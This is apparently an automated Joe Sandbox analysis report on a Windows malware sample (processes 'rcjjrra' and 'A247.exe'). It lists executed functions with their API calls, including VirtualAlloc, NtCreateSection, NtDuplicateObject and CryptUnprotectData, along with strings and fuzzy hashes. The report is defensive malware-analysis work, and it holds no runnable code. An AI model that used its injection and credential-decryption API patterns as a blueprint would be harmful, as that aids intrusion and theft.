API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
Instruction ID: 4b61e56e2161a851a120027933825f601e9725a76b72e0f731e8dd48e05b5e19
Opcode Fuzzy Hash: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
Instruction Fuzzy Hash: FC51F7B5900249BFEF209F91CC88FAFBBB9FF85B10F100159F911AA2A5D6749944CB24

Function 02E2003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02E2024D

Strings

kernel32.dll, xrefs: 02E2008F, 02E20095
cess, xrefs: 02E2018D

Memory Dump Source

Source File: 00000004.00000002.2319383367.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_rcjjrra.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: bf7558aa261c7e9f0bf3ab8e2195609813a6ede93c7c4eb9cfb164d9dfac32cf
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 13526B75A41229DFDB64CF58C984BACBBB1BF09314F1480D9E54DAB391DB30AA89CF14

Function 02EB16F9 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02EB1721
Module32First.KERNEL32(00000000,00000224), ref: 02EB1741

Memory Dump Source

Source File: 00000004.00000002.2319506605.0000000002EAB000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EAB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2eab000_rcjjrra.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 64e87a36ec20054c194901bde83871aad64e0d3633e1a70b02c704ebcb678976
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 1AF096311407246BD7213BF9A89CBEF76ECEF4A738F505528E64AD68C0DB70E8454A61

Function 02E20E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02E20223,?,?), ref: 02E20E19
SetErrorMode.KERNELBASE(00000000,?,?,02E20223,?,?), ref: 02E20E1E

Memory Dump Source

Source File: 00000004.00000002.2319383367.0000000002E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e20000_rcjjrra.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 00dfb41ce48c535117d73a9952129246be58987ed129c26202745da8aced8991
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: D5D0123114512877DB002A94DC09BCD7B1CDF05B66F008011FB0DD9080C770954046E5

Function 00401A01 Relevance: 1.3, APIs: 1, Instructions: 90
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A33

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702

Memory Dump Source

Source File: 00000004.00000002.2318388008.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rcjjrra.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
Instruction ID: 81c5b6d8da752c85ef5c48e217346158da0f95f2e0f30d6723e854e1366495a5
Opcode Fuzzy Hash: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
Instruction Fuzzy Hash: AE21383234E201EBDB009B90AD419BA3315AB85714F34467BF5137A1F2C63E99436F6B

Function 004019E3 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A33

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702

Memory Dump Source

Source File: 00000004.00000002.2318388008.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rcjjrra.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
Instruction ID: 3d34462ae554e6b9c52ec10bfc335e1d4eef14cf0cc07287d36856a9453ce069
Opcode Fuzzy Hash: a19bf6b6478727a7cf19fe344aa6eb98edbd1b9355ee0bc977b84921ba6b77a5
Instruction Fuzzy Hash: AA11E17274A205FBDB00AA949C41EBA3228AB45714F308577BA43780F1D57D8953BF6F

Function 004019EE Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A33

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702

Memory Dump Source

Source File: 00000004.00000002.2318388008.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rcjjrra.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
Instruction ID: fd11faa5c1113836d14621795cf3d83bd65fd701f71c993b701afff5049cc75c
Opcode Fuzzy Hash: c9c058988959fe6f1bebb02f4b63465d1859dbae07441d9c99848e32b1ac1650
Instruction Fuzzy Hash: 27018B3274A201EBDB009A949C42ABA3728AF45714F2045B7BA43B90F1C67D99536F2B

Function 004019FA Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A33

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702

Memory Dump Source

Source File: 00000004.00000002.2318388008.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rcjjrra.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
Instruction ID: 6cc9081dd0b90bd572a9145dab600ca03ca16d67528742debddf3dc55f5ee8c1
Opcode Fuzzy Hash: e11e32dbe801df22405823e13fb522a3676c7564745947c388d06d8c8a7d4e2f
Instruction Fuzzy Hash: 1A01C03274A105EBDB009A949C41EBA3328AB44710F308577BA43790F1C57D8A537F6F

Function 00401A09 Relevance: 1.3, APIs: 1, Instructions: 49
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A33

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702

Memory Dump Source

Source File: 00000004.00000002.2318388008.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rcjjrra.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
Instruction ID: 82411e1791d3a8170d7b0096784b0d07359e834b960e05cc8d1eb1f577d4cd17
Opcode Fuzzy Hash: cf05c8cd51f06970e1e68389e54baa8339b7ac568fc1d90295f4adfe3ec01b5a
Instruction Fuzzy Hash: 90018F3274A205EBDB00AAD4AC42EAA33289F45714F244577FA43B90F1C57D8A536F6B

Function 00401A10 Relevance: 1.3, APIs: 1, Instructions: 48
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401A33

Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702

Memory Dump Source

Source File: 00000004.00000002.2318388008.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_rcjjrra.jbxd

Similarity

API ID: CreateDuplicateObjectSectionSleep
String ID:
API String ID: 4152845823-0
Opcode ID: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
Instruction ID: 961536146c74ce18795349366bfe527767909b26be76020be6548142ac7a4a5b
Opcode Fuzzy Hash: 1ce4031546dc902cc4609c7e7de6d107d1fd440efca43239d715d6f2af8bec59
Instruction Fuzzy Hash: 47018472705209EBCB00ABD09C42EA933249B45314F644577FA12B90F2D67D89536B2B

Function 02EB13B8 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02EB1409

Memory Dump Source

Source File: 00000004.00000002.2319506605.0000000002EAB000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EAB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2eab000_rcjjrra.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: aca0863f55e7e82a0975681a254bdd2839b4a683540d9a625ab0b48d273b4740
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: E4112B79A40208EFDB01DF98C985E99BBF5AF08750F05C094F9489B361D771EA90DF80

Analysis Process: A247.exePID: 6204, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	8.1%
Dynamic/Decrypted Code Coverage:	34%
Signature Coverage:	8.6%
Total number of Nodes:	315
Total number of Limit Nodes:	11

Executed Functions

Function 004016E0 Relevance: 15.5, Strings: 12, Instructions: 492
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

[, xrefs: 00401948
8o, xrefs: 00401993
true, xrefs: 00401859
+, xrefs: 00401DD0
null, xrefs: 0040198E
Wn, xrefs: 00401A6D
false, xrefs: 00401871
{, xrefs: 00401A45
0, xrefs: 00401783
., xrefs: 00401789
Uh$C, xrefs: 0040198D
., xrefs: 004017AE

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: .$.$0$Uh$C$Wn$[$false$null$true${$+$8o
API String ID: 0-879020378
Opcode ID: b6e0a92ae582881cf6e2ff09ca5e905cd5929e3ea3787b5d42416239a9d202b1
Instruction ID: bd7178ecccf1f1e773a4192e4ca540b31a3e3f12fd5816677c43404a507449fe
Opcode Fuzzy Hash: b6e0a92ae582881cf6e2ff09ca5e905cd5929e3ea3787b5d42416239a9d202b1
Instruction Fuzzy Hash: B9F104B0A003059FE7105F65D885727BBE4AF54308F14853EE886A73E2EB3DE914CB5A

Function 0042EC90 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 0042ECDB
GetSystemMetrics.USER32 ref: 0042ECEE
DeleteObject.GDI32 ref: 0042ED67
SelectObject.GDI32 ref: 0042EDBF
SelectObject.GDI32 ref: 0042EE3E
DeleteObject.GDI32 ref: 0042EE7B

Strings

, xrefs: 0042EE0A

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 1449868515-3916222277
Opcode ID: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
Instruction ID: 60327d0f96a7b3deecf0ce21178eeb5ed9b1cd1e9f4d058b5d703ebe2579cb86
Opcode Fuzzy Hash: 39b23aab81d1e412ac723355e7e0d380e93785fe029945261b041932a7300441
Instruction Fuzzy Hash: C8B18CB85093808FE364DF29D58579BBBE0ABC9304F00892EE9D987350D7749548DF8A

Function 00427353 Relevance: 9.9, APIs: 2, Strings: 3, Instructions: 1198COMMON

Download Yara Rule

Strings

2PBb, xrefs: 004282C5
]hW9, xrefs: 0042812B
Yceh, xrefs: 00428121

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: 2PBb$Yceh$]hW9
API String ID: 0-1551782443
Opcode ID: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
Instruction ID: 0399154fc7d8c55f12102b5960697b3d06da357f666e701177502f53bd351286
Opcode Fuzzy Hash: f6dc15c76937f0d7342aa57ecbcc9b9ec27201aace4dd33c85c24a32b54af3b4
Instruction Fuzzy Hash: B7926C70208B908EE726CF35C4A07E7BBE1BF16305F44499DD1EB8B282DB796509CB55

Function 0041FD10 Relevance: 6.8, Strings: 5, Instructions: 531
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

a_, xrefs: 004202D0
gdeb, xrefs: 00420418
rr, xrefs: 00420107
}x, xrefs: 004200F1
gdeb, xrefs: 00420588

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: gdeb$gdeb$rr$}x$a_
API String ID: 0-3617765606
Opcode ID: 160d78a6efd3da6a260afc78eb2b8a18a40a6efa094f5dd60a18feddac919ad3
Instruction ID: 6e898c47a17abb5f03504fba61c95c3f7ffb61a8dca5b2db11db91053f235b82
Opcode Fuzzy Hash: 160d78a6efd3da6a260afc78eb2b8a18a40a6efa094f5dd60a18feddac919ad3
Instruction Fuzzy Hash: 4E2278B4108381DFE320CF24D895B6BBBE0FB86308F54892DE5D99B262D7399505CF96

Function 00409960 Relevance: 6.7, Strings: 5, Instructions: 472COMMON

Download Yara Rule

Strings

01, xrefs: 00409F46
0, xrefs: 004099D6
{hmn, xrefs: 00409C4E
[hct, xrefs: 00409C46
ZR\;, xrefs: 00409C08

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: 0$01$ZR\;$[hct${hmn
API String ID: 0-1484469362
Opcode ID: 1952e586741efe349940b8b2579c31be9290b0668362d89d13c6bd99627ff31b
Instruction ID: 48ecf83dcb48e748d01dfa638aea1d50d8185787a1297f3da60f3c5648012799
Opcode Fuzzy Hash: 1952e586741efe349940b8b2579c31be9290b0668362d89d13c6bd99627ff31b
Instruction Fuzzy Hash: 971202B02083818BE724CF15C4A476FBBE1BBC6348F144D2DE5D58B292D77AD809CB96

Function 0041537E Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 232encryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0041564F

Strings

., xrefs: 004154B9
=, xrefs: 004154B2

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: CryptDataUnprotect
String ID: .$=
API String ID: 834300711-1678909263
Opcode ID: 5981a5e9124ce2c7fd199e7564f4660ec5c48ed11d6919a86d8932acacd9bcf1
Instruction ID: 1ba618c7c74fca3a6dab2d59277d8eb37d046adcbf7b7a58cf2c090dca870eab
Opcode Fuzzy Hash: 5981a5e9124ce2c7fd199e7564f4660ec5c48ed11d6919a86d8932acacd9bcf1
Instruction Fuzzy Hash: 9481D5B1508740CFD724CF29C49179BBBE2AFD6308F184A2EE1A58B392D739D945CB46

Function 00404970 Relevance: 2.9, Strings: 2, Instructions: 408COMMON

Download Yara Rule

Strings

), xrefs: 00404A08
IEND, xrefs: 00404DE1

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
Instruction ID: 05b6572399bca2268092eb3df2821dc4a125dc7a7576062249b5a2d5c26daba1
Opcode Fuzzy Hash: e7903be39d4e34c9f5b2804a62402e159c365d2c7a7c9331be733edcae7195fd
Instruction Fuzzy Hash: 4CE1B1B2A083449BD714CF28D88175B7BE5ABD4314F14853EFA95AB3C1D778E904CB8A

Function 00420880 Relevance: 2.9, Strings: 2, Instructions: 390COMMON

Download Yara Rule

Strings

gdeb, xrefs: 004208D8
]hiX, xrefs: 00420C74

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: InitializeThunk
String ID: ]hiX$gdeb
API String ID: 2994545307-4273025081
Opcode ID: 0af8f851243c083cd7282178df80fafc931ed58b30864f9afe64c0ae9b9a94e2
Instruction ID: 336b67656a256fc3d7c49e2fee8c29aa2d9fc5d5d61a2c4a19b8c8911d00a2fb
Opcode Fuzzy Hash: 0af8f851243c083cd7282178df80fafc931ed58b30864f9afe64c0ae9b9a94e2
Instruction Fuzzy Hash: B6C1E3B17083118FD714CF15D89172BBBE1EBD5318FA48A2EE4959B382D738D845CB8A

Function 004168EF Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

IO, xrefs: 004169A4

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: IO
API String ID: 0-3981347273
Opcode ID: d76fc23780b8b3708350e07c8a348741ecdd66ae8275a383e63f3e58709d03e5
Instruction ID: 51fd4917a3c3351c2bbf2a3dc6b6b13a62bcc2487d4881d1c48f1649ea521d72
Opcode Fuzzy Hash: d76fc23780b8b3708350e07c8a348741ecdd66ae8275a383e63f3e58709d03e5
Instruction Fuzzy Hash: 94D132B1200B018BD724CF15C590B52BBF2FF4A704F158A9DD89A8FB56D739E985CB88

Function 00415FE1 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfbe77f11fd2a3400dddf2b914f793015f146d5b479b55d28ac242ef93d89d80
Instruction ID: 02b8bb6e56041378f4f9f2711353cce18edc58b923ed8b10765db063976cd2a1
Opcode Fuzzy Hash: dfbe77f11fd2a3400dddf2b914f793015f146d5b479b55d28ac242ef93d89d80
Instruction Fuzzy Hash: EA41BD745083528BC724CF14C8617ABB7E1FF89358F054A1DE9DA9B381E7389985CB8A

Function 0042B20E Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
Instruction ID: 151cf318142fe4857ebf8dfdf36c3425f9736b69a2a980a3f824acb8caea4c7c
Opcode Fuzzy Hash: 6267cfd9be4afba129147b6b4996751238124f7394fccf3144a8ff5b67e9c5bc
Instruction Fuzzy Hash: 36F039B45093418FC320EF25D55474ABBE1ABD8304F01882DE489C7391DBB99858CF86

Function 0061003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0061024D

Strings

kernel32.dll, xrefs: 0061008F, 00610095
cess, xrefs: 0061018D

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: b40402b49297019ac0359b46df886006c9cefe6b746cbecd0bbf5e598aecbc36
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 24526874A012299FDB64CF68C985BA8BBB1BF09304F1480D9E54DAB351DB70AAC5DF14

Function 0041CFA0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 200
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 0041D0A0
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 0041D0CD

Strings

U5U7, xrefs: 0041D0DB
K-K/, xrefs: 0041D0EB
\1B3, xrefs: 0041D14E

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: K-K/$U5U7$\1B3
API String ID: 237503144-1235027928
Opcode ID: 9e4d9b1ca5f46c68a711a75bebcb02cde56515bb47970f41a18ba400b158c802
Instruction ID: 085b80d8ebaf4cdc089f22804327f41de0cf31be30b47905784d4d41386d2044
Opcode Fuzzy Hash: 9e4d9b1ca5f46c68a711a75bebcb02cde56515bb47970f41a18ba400b158c802
Instruction Fuzzy Hash: F76177B56083518FD324CF14C8A0BABB7E1EF8A308F054A1DE8E65B381D7749945CBA7

Function 0041D8E0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 0041DA0A
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,?,?), ref: 0041DA3A

Strings

eI.K, xrefs: 0041D918
qs, xrefs: 0041D926

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: eI.K$qs
API String ID: 237503144-3936219367
Opcode ID: 22590df5b0a7f23595e35109344cedd9b17127ade37266cabec56ebe3dcee421
Instruction ID: 3ad400ec4d5e0868339db15895de8c0dbb191545bfc635c07005ecffac5dc4ed
Opcode Fuzzy Hash: 22590df5b0a7f23595e35109344cedd9b17127ade37266cabec56ebe3dcee421
Instruction Fuzzy Hash: 915154B0100B009BD724CF26C890BA7BBB5FF46314F544A1CE8A64BB89D774F549CB98

Function 00408EA0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 00408F14

Strings

of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in, xrefs: 00408EDE

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: ExitProcess
String ID: of system that leetspeak, reflection primarily the of other modified on glyphs resemblance is replacements similarity or eleet the ways used character a often spellings on play uses their via internet. or it in
API String ID: 621844428-2804141084
Opcode ID: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
Instruction ID: 4cc74d5fb66ad9159a78e8348017eb50dff1af742bc963a264908d0417922e34
Opcode Fuzzy Hash: d3fc2cdc024533b6e08ef3c83f20ae28995cdbdfa2716207c1ee4e745a0791f4
Instruction Fuzzy Hash: A5F0FFB0408202CEC750BF72D70626A7BA5AF64364F10593FEAD5A12D1EE3C84459E5F

Function 004337FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00433840

Strings

:, xrefs: 00433804
\, xrefs: 0043380B
C, xrefs: 004337FD

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID: InformationVolume
String ID: :$C$\
